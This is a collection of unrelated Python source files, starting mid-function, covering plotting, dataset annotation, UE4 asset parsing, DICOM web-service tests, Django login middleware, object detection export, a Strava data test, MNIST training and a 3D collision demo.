df_work.reset_index(inplace=True)
df_work.rename(columns={'index': 'direction'}, inplace=True)
df_work[color] = df_work[color].fillna(0)
df_work.loc[df_work[color] == 0, 'frequency'] = 0
if r == 'auto':
r = 'frequency'
try:
labels = {color: f'{self.vocabulary[color]["long_name"]} ({self.vocabulary[color]["units"]})'}
except KeyError:
labels=None
fig = px.bar_polar(df_work, r=r, theta="direction", color=color,
color_continuous_scale= color_continuous_scale,
template=template, labels=labels)
return fig
|
11557929
|
import os
import sys
import json
from sklearn.model_selection import train_test_split
def load_labels(database_path):
if os.path.isdir(database_path):
labels = os.listdir(database_path)
return labels
def get_dataset(database_path):
if not os.path.exists(database_path):
raise IOError('not exist path')
no_dir = os.path.join(database_path, 'no')
fi_dir = os.path.join(database_path, 'fi')
no_data = os.listdir(no_dir)
fi_data = os.listdir(fi_dir)
no_train, no_test = train_test_split(no_data, test_size=0.2, shuffle=True)
fi_train, fi_test = train_test_split(fi_data, test_size=0.2, shuffle=True)
train_database = {}
for file_name in no_train:
name, _ = os.path.splitext(file_name)
train_database[name] = {}
train_database[name]['subset'] = 'training'
train_database[name]['annotations'] = {'label': 'no'}
for file_name in fi_train:
name, _ = os.path.splitext(file_name)
train_database[name] = {}
train_database[name]['subset'] = 'training'
train_database[name]['annotations'] = {'label': 'fi'}
val_database = {}
for file_name in no_test:
name, _ = os.path.splitext(file_name)
val_database[name] = {}
val_database[name]['subset'] = 'validation'
val_database[name]['annotations'] = {'label': 'no'}
for file_name in fi_test:
name, _ = os.path.splitext(file_name)
val_database[name] = {}
val_database[name]['subset'] = 'validation'
val_database[name]['annotations'] = {'label': 'fi'}
return train_database, val_database
def generate_annotation(database_path, dst_json_path):
labels = load_labels(database_path)
train_database, val_database = get_dataset(database_path)
dst_data = {}
dst_data['labels'] = labels
dst_data['database'] = {}
dst_data['database'].update(train_database)
dst_data['database'].update(val_database)
with open(dst_json_path, 'w') as dst_file:
json.dump(dst_data, dst_file)
if __name__ == '__main__':
database_path = sys.argv[1]
dst_json_path = database_path + '.json'
generate_annotation(database_path, dst_json_path)
|
11557935
|
from typing import List
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.Structs.Vector import FVector
class FPositionVertexBuffer:
Verts: List[FVector]
Stride: int
NumVertices: int
def __init__(self, reader: BinaryStream):
self.Stride = reader.readInt32()
self.NumVertices = reader.readInt32()
self.Verts = reader.readBulkTArray(FVector, reader)
def GetValue(self):
return {
"Stride": self.Stride,
"NumVertices": self.NumVertices,
"Vertices": [x.GetValue() for x in self.Verts]
}
|
11557949
|
import unittest
import odil
class TestSelector(unittest.TestCase):
def test_default_constructor(self):
selector = odil.webservices.Selector()
self.assertFalse(selector.is_study_present())
self.assertFalse(selector.is_series_present())
self.assertFalse(selector.is_instance_present())
self.assertEqual(list(selector.get_frames()), [])
def test_full_constructor(self):
selector = odil.webservices.Selector({"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertTrue(selector.is_study_present())
self.assertEqual(selector.get_study(), "1.2")
self.assertTrue(selector.is_series_present())
self.assertEqual(selector.get_series(), "3.4")
self.assertTrue(selector.is_instance_present())
self.assertEqual(selector.get_instance(), "5.6")
self.assertEqual(list(selector.get_frames()), [7,8])
def test_get_path_no_frames(self):
selector = odil.webservices.Selector(
{"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertEqual(
selector.get_path(False), "/studies/1.2/series/3.4/instances/5.6")
def test_get_path_frames(self):
selector = odil.webservices.Selector(
{"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertEqual(
selector.get_path(True),
"/studies/1.2/series/3.4/instances/5.6/frames/7,8")
if __name__ == "__main__":
unittest.main()
|
11557952
|
from re import compile
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
if hasattr(settings, "LOGIN_REQUIRED_URLS"):
URLS = [compile(expr) for expr in settings.LOGIN_REQUIRED_URLS]
class ActiveUserRequiredMiddleware:
"""
Middleware that requires a user to be active to view any page specified in
settings.LOGIN_REQUIRED_URLS. Since these urls are reguralar expressions,
you can copy them from your urls.py.
Requires authentication middleware and template context processors to be
loaded. You'll get an error if they aren't.
"""
def process_request(self, request):
path = request.path_info.lstrip("/")
if any(u.match(path) for u in URLS):
if not request.user.is_active:
next_url = request.get_full_path()
return redirect_to_login(next_url, settings.LOGIN_URL,
REDIRECT_FIELD_NAME)
|
11557963
|
import argparse
import json
import os
from typing import List, Tuple
import numpy as np
from PIL import Image, ImageFile
import tensorflow as tf
from tqdm import tqdm
# A couple of images are a bit large, we set this flag to load them properly.
ImageFile.LOAD_TRUNCATED_IMAGES = True
parser = argparse.ArgumentParser()
parser.add_argument(
"--graph",
default="models/open_images_train_tensorflow_detection_api/"
"faster_rcnn_inception_resnet_v2_atrous_oid_v4_2018/frozen_inference_graph.pb",
help="Path to frozen inference graph of pre-trained detector.",
)
parser.add_argument(
"--images", help="Path to a directory containing images for a particular split."
)
parser.add_argument(
"--annotations",
help="Path to annotations JSON file (in COCO format) containing image info.",
)
parser.add_argument(
"--boxes-per-image",
type=int,
default=18,
help="Number of detected bounding boxes per image.",
)
parser.add_argument(
"--output",
default="/outputs/detections.json",
help="Path to save the output JSON (in COCO format) with detected boxes.",
)
def _image_ids(annotations_path: str) -> List[Tuple[int, str]]:
r"""
Given path to an annotation file in COCO format, return ``(image_id, filename)`` tuples.
Parameters
----------
annotations_path: str
Path to an annotation file in COCO format. Must contain "images" key.
Returns
-------
List[Tuple[int, str]]
List of ``(image_id, filename)`` tuples.
"""
image_annotations = json.load(open(annotations_path))["images"]
image_ids = [(im["id"], im["file_name"]) for im in image_annotations]
image_ids = sorted(image_ids, key=lambda k: k[0])
return image_ids
if __name__ == "__main__":
_A = parser.parse_args()
# List of tuples of image IDs and their file names.
image_ids = _image_ids(_A.annotations)
# Populate this dict with all the detected boxes (in COCO format).
output_coco_format = {"categories": [], "images": [], "annotations": []}
# --------------------------------------------------------------------------------------------
# Load Faster-RCNN frozen inference graph. Contains both, architecture definition and weights.
rcnn_frozen_inference_graph = tf.Graph()
with rcnn_frozen_inference_graph.as_default():
rcnn_frozen_inference_graphdef = tf.GraphDef()
with tf.gfile.GFile(_A.graph, "rb") as f:
rcnn_frozen_inference_graphdef.ParseFromString(f.read())
tf.import_graph_def(rcnn_frozen_inference_graphdef, name="")
# Get handles to input and output tensors.
image_tensor = tf.get_default_graph().get_tensor_by_name("image_tensor:0")
detection_outputs = {
key: tf.get_default_graph().get_tensor_by_name(key + ":0")
for key in [
"num_detections",
"detection_boxes",
"detection_scores",
"detection_classes",
]
}
# --------------------------------------------------------------------------------------------
# --------------------------------------------------------------------------------------------
# Run inference on all images and save predicted boxes, classes and confidence scores.
with rcnn_frozen_inference_graph.as_default():
session = tf.Session()
for image_id, image_filename in tqdm(image_ids):
image_path = os.path.join(_A.images, image_filename)
image = Image.open(image_path).convert("RGB")
image_width, image_height = image.size
image_ndarray = np.array(image)
# Run inference on image (add batch dimension first).
output_dict = session.run(
detection_outputs,
feed_dict={image_tensor: np.expand_dims(image_ndarray, 0)},
)
# Remove the batch dimension and cast outputs to appropriate types.
output_dict["detection_boxes"] = output_dict["detection_boxes"][0]
output_dict["detection_classes"] = output_dict["detection_classes"][0]
output_dict["detection_scores"] = output_dict["detection_scores"][0]
# Populate the image info in COCO format. This is just for completeness of the output
# detections JSON file.
output_coco_format["images"].append(
{
"id": image_id,
"file_name": image_filename,
"height": image_height,
"width": image_width,
}
)
# Populate the output detections list with these detections.
# Boxes (and corresponding classes) list is sorted by decreasing confidence score.
for box, clss, score in zip(
output_dict["detection_boxes"],
output_dict["detection_classes"],
output_dict["detection_scores"],
):
if sum(box) > 0:
# This is not a zero-area box (padding).
# Boxes are of the form [Y1, X1, Y2, X2] in [0, 1].
# Convert to [X1, Y1, X2, Y2]. Also, un-normalize by image width and height.
box = [
box[1] * image_width,
box[0] * image_height,
box[3] * image_width,
box[2] * image_height,
]
output_coco_format["annotations"].append(
{
"image_id": image_id,
"category_id": int(clss),
"bbox": [float(coordinate) for coordinate in box],
"score": float(score),
}
)
# --------------------------------------------------------------------------------------------
# Populate the (Open Images) categories field from external file, for completeness.
# This path is relative to $PROJECT_ROOT, so make sure to run script from there.
output_coco_format["categories"] = json.load(open("data/oi_categories.json"))
print("Saving output detections to {}...".format(_A.output))
json.dump(output_coco_format, open(_A.output, "w"))
|
11557969
|
import pytest
import pandas as pd
import sweat
from sweat.io import strava
from .utils import sweatvcr
def test_top_level_import():
assert sweat.read_strava == strava.read_strava
@sweatvcr.use_cassette()
def test_read_strava():
activity = sweat.read_strava(
activity_id="3547667536", access_token="<PASSWORD>"
)
assert isinstance(activity, pd.DataFrame)
assert isinstance(activity.index, pd.DatetimeIndex)
columns = set(
[
"elevation",
"speed",
"cadence",
"grade",
"heartrate",
"power",
"temperature",
"distance",
"moving",
"latitude",
"longitude",
]
)
assert columns == set(activity.columns.tolist())
|
11558023
|
import os
import sys
import inspect
def init():
# realpath() with make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "../")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
|
11558026
|
import numpy as np
from vulcanai.net import Network
import theano.tensor as T
from vulcanai.utils import get_one_hot
from vulcanai import mnist_loader
from vulcanai.model_tests import run_test
(train_images, train_labels, test_images, test_labels) = mnist_loader.load_fashion_mnist()
train_labels = get_one_hot(train_labels)
input_var = T.fmatrix('input')
y = T.fmatrix('truth')
network_dense_config = {
'mode': 'dense',
'units': [512],
'dropouts': [0.2],
}
dense_net = Network(
name='3_dense_test',
dimensions=[None] + list(train_images.shape[1:]),
input_var=input_var,
y=y,
config=network_dense_config,
input_network=None,
num_classes=10,
activation='rectify',
pred_activation='softmax',
optimizer='adam')
# # Use to load model from disk
# # dense_net = Network.load_model('models/20170704194033_3_dense_test.network')
dense_net.train(
epochs=2,
train_x=train_images[:50000],
train_y=train_labels[:50000],
val_x=train_images[50000:60000],
val_y=train_labels[50000:60000],
batch_ratio=0.05,
plot=True
)
dense_net.save_record()
run_test(dense_net, test_x=train_images[50000:60000], test_y=train_labels[50000:60000])
dense_net.save_model()
|
11558028
|
import os
from payton.scene import Scene
from payton.scene.collision import CollisionTest
from payton.scene.geometry import Wavefront
from payton.scene.gui import info_box
direction = 0
def motion(period, total):
global scene, direction
pos = scene.objects["scar2"].position
apos = scene.objects["acar2"].position
if direction == 0:
pos[2] -= 0.01
apos[2] -= 0.01
else:
pos[2] += 0.01
apos[2] += 0.01
if pos[2] < 0:
direction = 1
if pos[2] > 4:
direction = 0
scene.objects["scar2"].position = pos
scene.objects["acar2"].position = apos
def hit_sphere(collision, pairs):
for pair in pairs:
pair[0].material.color = [1.0, 0, 0]
pair[1].material.color = [1.0, 0, 0]
# Once there is a hit, system will not check
# for the same collision, if you want to have the objects
# back in the collision detection pipeline, you have to do
collision.resolve(pair[0], pair[1])
return True
def hit_aabb(collision, pairs):
for pair in pairs:
pair[0].material.color = [0.0, 1.0, 0]
pair[1].material.color = [0.0, 1.0, 0]
# Once there is a hit, system will not check
# for the same collision, if you want to have the objects
# back in the collision detection pipeline, you have to do
collision.resolve(pair[0], pair[1])
return True
scene = Scene(width=600, height=600)
spherical_collision = CollisionTest(callback=hit_sphere, level=CollisionTest.SPHERICAL)
aabb_collision = CollisionTest(callback=hit_aabb, level=CollisionTest.AABB)
car_object_file = os.path.join(os.path.dirname(__file__), "lib", "Low-Poly-Racing-Car.obj")
spherical_car_1 = Wavefront(filename=car_object_file)
spherical_car_2 = Wavefront(filename=car_object_file)
aabb_car_1 = Wavefront(filename=car_object_file)
aabb_car_2 = Wavefront(filename=car_object_file)
spherical_car_1.position = [-2, 0, 0]
spherical_car_2.position = [-2, 0, 4]
aabb_car_1.position = [2, 0, 0]
aabb_car_2.position = [2, 0, 4]
scene.add_object("scar1", spherical_car_1)
scene.add_object("scar2", spherical_car_2)
scene.add_object("acar1", aabb_car_1)
scene.add_object("acar2", aabb_car_2)
spherical_collision.add_object(spherical_car_1)
spherical_collision.add_object(spherical_car_2)
aabb_collision.add_object(aabb_car_1)
aabb_collision.add_object(aabb_car_2)
scene.add_collision_test("spherical_collision", spherical_collision)
scene.add_collision_test("aabb_collision", aabb_collision)
scene.create_clock("motion", 0.01, motion)
scene.add_object(
"info",
info_box(left=10, top=10, label="Hit SPACE to start animation"),
)
scene.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.